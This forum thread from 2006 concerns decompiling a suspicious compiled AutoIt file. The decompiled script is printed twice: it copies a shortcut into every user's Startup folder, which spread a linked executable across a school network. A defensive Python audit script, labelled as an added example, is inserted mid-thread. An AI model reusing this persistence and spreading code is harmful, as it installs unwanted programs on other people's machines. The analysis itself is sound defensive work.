IAmABanana Posted May 8, 2006

Hi, I was wondering, is there a way to unpack a compiled AutoIt file? I got infected with a weird AutoIt file somehow, and I guess it's a keylogger. If that's the case, then his email address or FTP server address should be in it. I saw it was compiled with a (probably modified) UPX. The original file size was 118 KB, and I already unpacked it halfway to 336 KB, and I can see half of the functions, but still not enough to get much info about what it does. So, is there a way to open that script and see its functions? Or is there an unpacker that unpacks it correctly? Gr.
Xenobiologist Posted May 8, 2006

Hi, AutoIt itself delivers an unpacker. But maybe the exe was secured with a password. Give it a try. So long, Mega
IAmABanana (Author) Posted May 8, 2006

> Hi, AutoIt itself delivers an unpacker. But maybe the exe was secured with a password. Give it a try. So long, Mega

Hmm... I tried that, and it says something like "this is not a compiled AutoIt script" or something like that. But it has an AutoIt icon, it was named ai.exe, and it's packed the same. On a forum I saw "This special exe2aut.exe will autofilling the passphrase and decompile every AutoIT_3.1-scriptfile". But the link they gave to it is dead. Does anyone here have that?
Xenobiologist Posted May 8, 2006 (edited)

> Hmm... I tried that, and it says something like "this is not a compiled AutoIt script" or something like that. But it has an AutoIt icon, it was named ai.exe, and it's packed the same. On a forum I saw "This special exe2aut.exe will autofilling the passphrase and decompile every AutoIT_3.1-scriptfile". But the link they gave to it is dead. Does anyone here have that?

Hi, as far as I know there is a decompiler, but it runs only with old autoit.exe files. So you won't get any further by getting the link. So long, Mega

Edited May 8, 2006 by th.meger
IAmABanana (Author) Posted May 8, 2006

> Hi, as far as I know there is a decompiler, but it runs only with old autoit.exe files. So you won't get any further by getting the link. So long, Mega

Hi, I dumped the packer correctly now. According to the data, it's:

Length Of Struc: 01B8h
Length Of Value: 0034h
Type Of Struc: 0000h
Info: VS_VERSION_INFO
Signature: FEEF04BDh
Struc Version: 1.0
File Version: 3.1.1.0
Product Version: 3.1.1.0
File Flags Mask: 0.23
File Flags:
File OS: WINDOWS32
File Type: UNKNOWN
File SubType: UNKNOWN
File Date: 00:00:00 00/00/0000
Struc has Child(ren). Size: 348 bytes.
Child Type: StringFileInfo
Language/Code Page: 2057/1200
Comments: http://www.autoitscript.com/autoit3/compiled.html
FileDescription:
FileVersion: 3, 1, 1, 0
Child Type: VarFileInfo
Translation: 2057/1200

But I still can't really see what it does, because it's spoiled with all kinds of AutoIt functions, and I don't think it uses all of them. Look: http://img443.imageshack.us/img443/8476/look5vj.gif This makes it kind of hard to actually see what it does. Any suggestions?
w0uter Posted May 8, 2006

Post the script here and I'll make a dump of the script. If it is hostile I will post it here.
seandisanti Posted May 8, 2006

> Hi, I dumped the packer correctly now. According to the data, it's: [version info quoted above] But I still can't really see what it does, because it's spoiled with all kinds of AutoIt functions, and I don't think it uses all of them. Look: http://img443.imageshack.us/img443/8476/look5vj.gif This makes it kind of hard to actually see what it does. Any suggestions?

You're going about it the wrong way. So you know, you should just get the newest UPX (it's free) and unpack it directly. Then you'll have the source (assuming it's not password protected). Using a real-time debugger like the one you're using, the only hope that you have is that the info you're looking for (e-mail or web address) may be in the referenced text strings, but not likely, because of the way that the interpreter and source are just packaged together, and the code is not actually compiled in the typical sense.
IAmABanana (Author) Posted May 8, 2006 (edited)

> Post the script here and I'll make a dump of the script. If it is hostile I will post it here.

OK, here it is.

Edit: @cameronsdad, UPX 2.00D is the newest; in fact, that can't unpack it. It says it's not packed with UPX or gives a 0000X0 error. upx125w, though, can unpack it, but not to an AutoIt source, but to a C++ compiled .exe (according to PEiD).

autoit_thing.rar

Edited May 8, 2006 by IAmABanana
IAmABanana (Author) Posted May 8, 2006

Bump, and solved. OK, never mind, a friend sent me a modded unpacker that just gets the code from the file itself and then unpacks it.

; <AUT2EXE VERSION: 3.1.1.0>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------
FileChangeDir("C:\Documents and Settings")

; Shows the filenames of all files in the current directory
$search = FileFindFirstFile("*.*")

; Check if the search was successful
If $search = -1 Then
    MsgBox(0, "Error", "No files/directories matched the search pattern")
    Exit
EndIf

While 1
    $file = FileFindNextFile($search)
    If @error Then ExitLoop
    If $file = "." Then
    Else
        If $file = ".." Then
        Else
            FileCopy("H:\link2.lnk", "C:\Documents and Settings\" & $file & "\Menu Start\Programma's\Opstarten", 1)
        EndIf
    EndIf
WEnd

; Close the search handle
FileClose($search)
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------
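The decompiled script above drops the same shortcut into the Startup folder of every profile under C:\Documents and Settings, so the cleanup question for an administrator is "which profiles got it?". The following audit is an added example written for this thread, not code posted by anyone in it and not part of AutoIt: it walks a profile root, checks each user's Startup folder (both the English layout and the Dutch "Menu Start\Programma's\Opstarten" layout the script targets; covering only those two is an assumption) and reports every .lnk found. The profile tree it scans is constructed in a temporary directory so the check runs offline; the byte content written for the sample shortcut is a placeholder, not a real .lnk.

```python
"""Audit per-user Startup folders for shortcut (.lnk) files.

Added example (not from the forum thread). Given a profile root such as
C:\\Documents and Settings, walk every user profile, look in its Startup
folder and list every .lnk there, so an admin can see which users were hit.
"""
import tempfile
from pathlib import Path

# Startup folder paths relative to a user profile. Assumption: only the
# English layout and the Dutch layout seen in the decompiled script matter.
STARTUP_SUBPATHS = [
    Path("Start Menu") / "Programs" / "Startup",
    Path("Menu Start") / "Programma's" / "Opstarten",
]


def find_startup_shortcuts(profile_root):
    """Return a sorted list of (username, shortcut_path) for every .lnk file
    found in any known Startup folder below profile_root."""
    root = Path(profile_root)
    hits = []
    for profile in sorted(root.iterdir()):
        if not profile.is_dir():
            continue
        for sub in STARTUP_SUBPATHS:
            startup = profile / sub
            if not startup.is_dir():
                continue
            for entry in sorted(startup.iterdir()):
                # Only shortcut files count; desktop.ini and friends are ignored.
                if entry.is_file() and entry.suffix.lower() == ".lnk":
                    hits.append((profile.name, str(entry)))
    return hits


def users_with_shortcut(profile_root, shortcut_name):
    """Names of the users whose Startup folder holds shortcut_name
    (case-insensitive, since NTFS is)."""
    return sorted({user for user, path in find_startup_shortcuts(profile_root)
                   if Path(path).name.lower() == shortcut_name.lower()})


def build_sample_profile_root():
    """Create a constructed profile tree in a temporary directory that mirrors
    what the decompiled script leaves behind: the same shortcut in every
    user's Dutch-localized Startup folder, plus one clean English profile.
    Returns the root path."""
    root = Path(tempfile.mkdtemp(prefix="profiles_"))
    for user in ("alice", "bob"):
        startup = root / user / "Menu Start" / "Programma's" / "Opstarten"
        startup.mkdir(parents=True)
        # Constructed placeholder bytes; not a real shortcut file.
        (startup / "link2.lnk").write_bytes(b"L\x00\x00\x00")
    clean = root / "carol" / "Start Menu" / "Programs" / "Startup"
    clean.mkdir(parents=True)
    (clean / "desktop.ini").write_text("[.ShellClassInfo]\n")
    return root


if __name__ == "__main__":
    sample = build_sample_profile_root()
    for user, path in find_startup_shortcuts(sample):
        print(f"{user}: {path}")
```

On a real machine you would pass the actual profile root instead of the constructed one; the function only reads directory listings, so it is safe to run on a suspect host before deciding what to remove.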
seandisanti Posted May 8, 2006

> Bump, and solved. OK, never mind, a friend sent me a modded unpacker that just gets the code from the file itself and then unpacks it. [decompiled script quoted above]

OK... so it doesn't do anything.
IAmABanana (Author) Posted May 8, 2006

> OK... so it doesn't do anything.

Well, actually, yes it does. C:\Documents and Settings\" & $file & "\Menu Start\Programma's\Opstarten would get something like C:\Documents and Settings\{username}\Menu Start\Programma's\Opstarten = startup folder. H:\link2.lnk is a shortcut to another virus-like file...
w0uter Posted May 8, 2006

Aww, and I was just finished eating.

; <AUT2EXE VERSION: 3.1.1.0>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------
FileChangeDir("C:\Documents and Settings")

; Shows the filenames of all files in the current directory
$search = FileFindFirstFile("*.*")

; Check if the search was successful
If $search = -1 Then
    MsgBox(0, "Error", "No files/directories matched the search pattern")
    Exit
EndIf

While 1
    $file = FileFindNextFile($search)
    If @error Then ExitLoop
    If $file = "." Then
    Else
        If $file = ".." Then
        Else
            FileCopy("H:\link2.lnk", "C:\Documents and Settings\" & $file & "\Menu Start\Programma's\Opstarten", 1)
        EndIf
    EndIf
WEnd

; Close the search handle
FileClose($search)
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: F:\AutoIt\aa.au3>
; ----------------------------------------------------------------------------
seandisanti Posted May 8, 2006

> Well, actually, yes it does. C:\Documents and Settings\" & $file & "\Menu Start\Programma's\Opstarten would get something like C:\Documents and Settings\{username}\Menu Start\Programma's\Opstarten = startup folder. H:\link2.lnk is a shortcut to another virus-like file...

What does that file do? The one that's linked to.
JSThePatriot Posted May 8, 2006

This doesn't really do much... unless the H: drive was plugged into your computer. This code is harmless. You can't copy a .lnk file from H if you don't have an H... most computers don't. I am assuming someone had a small utility that they didn't expect someone was going to use. If you have excluded some information then please feel free to show me, but the above code is harmless. It won't even run in AutoIt without an H drive. Try harder next time, JS
seandisanti Posted May 8, 2006

> This doesn't really do much... unless the H: drive was plugged into your computer. This code is harmless. [...] It won't even run in AutoIt without an H drive. Try harder next time, JS

That's how I saw it too, so I was looking for more info when he said that it ran 'another virus-like file'.
JSThePatriot Posted May 8, 2006

> That's how I saw it too, so I was looking for more info when he said that it ran 'another virus-like file'.

To me it's all hype... until he shows something more definite. Sure, it "could" link to a virus, IF indeed you had an H: drive it could copy that "bad" link from. Too many variables to really be a virus-infected script. It was definitely not this script that caused issues. Unless of course someone knew he had a drive H, and a shortcut on it with that name, and was able to also know that it went to something bad and just copied it to the startup folder of every available user. Now again, that is VERY unlikely. JS
IAmABanana (Author) Posted May 9, 2006

> To me it's all hype... until he shows something more definite. [...] Now again, that is VERY unlikely. JS

Well, because you care so much: our school network was infected with this, and some other crap files... When you log in, your personal files go to h:\(documents and settings). So, this thing first copied itself from the startup folder to the startup folder of the user. Then, if the user logs in somewhere else, the file gets called from h:\documents and settings\startup and copies itself to the c:\ startup. So if someone else logs in on that same computer, he also has it, and if he logs in somewhere else, that gets infected... and all of a sudden the entire network has it. What the .exe that link2.lnk is linked to does is not really important, but now you see this thing was part of a virus code (a noobie-coded one, but still...)
JSThePatriot Posted May 9, 2006

> Well, because you care so much: our school network was infected with this, and some other crap files... [...] but now you see this thing was part of a virus code (a noobie-coded one, but still...)

Now you have extended us the courtesy which you should have passed along in the first place. What the EXE in the .lnk does is the virus, not this code. This code just ensures that the .exe will run no matter where you are. Apparently it is someone in your school that knows a bit of AutoIt that created this script to copy that link to that EXE. This file isn't an infection. If you have had any troubles, it will be from the .EXE that the shortcut points to. After all, the final destination of this script is to make sure that runs! Again I state: the above script that has been shown to us is in no way harmful. It may be a nuisance, but you should have precautions that would keep these things from happening. If the EXE isn't anything bad then there is nothing malicious about this program. JS
Jos (Developers) Posted May 9, 2006

> C:\Documents and Settings\{username}\Menu Start\Programma's\Opstarten

Sounds Dutch to me... You want me to stop by and teach them a lesson? (And that won't be in AutoIt3.) Now the question in my mind is: how is it possible to create a shortcut to a virus that is always available to everybody in the school network and will automatically be run? That would require some sort of elevated access to a server, I assume. Nice challenge, these school networks.